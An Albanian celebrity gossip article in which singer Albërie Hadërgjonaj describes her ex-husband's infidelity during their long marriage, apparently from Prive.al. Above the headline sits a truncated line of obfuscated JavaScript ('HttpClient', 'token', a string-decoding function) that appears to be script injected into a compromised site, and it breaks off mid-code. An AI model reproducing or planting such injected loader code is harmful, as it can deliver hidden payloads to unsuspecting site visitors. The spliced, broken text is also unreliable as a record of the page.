;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Albërie Hadërgjonaj rrëfehet: Bashkëshorti më tradhtonte! (VIDEO)

By

Vëmendjen e publikut, e pati të tërën për vete ditëve të fundit.

Këngëtarja e famshme shqiptare Albërie Hadërgjonaj, është treguar tejet e sinqertë duke folur për jetën e saj private dhe divorcin nga ish bashkëshorti.

Mbrëmjen e kaluar, e ftuar në emisionin Top Show Magazine, Hadërgjonaj ka rrëfyer një pjesë të pathënë nga jeta e saj.

“U lamë të dy. Ai ka dashur të më lërë që kur u martuam” – e nisi me humor Albëria, por më tej rrëfeu se, në të vërtetë, pavarësisht plot 19 viteve martesë, nuk kanë qenë bashkë, sepse kanë jetuar gjithmonë të ndarë.

“Kam pasur një martesë që e kam dashur shumë, ai më ka tradhtuar gjithmonë, absolutisht po… Isha e vogël dhe nuk kisha eksperiencë jete. Më vonë, pasi u rrita, e përjetova ndryshe. Jemi martuar shumë të rinj, pastaj ai ishte dhe është burrë shumë i pashëm, kishte lekë, ndaj edhe vajzat i vardiseshin”, ka thënë këngëtarja. /Prive.al

Artikuj të ngjashëm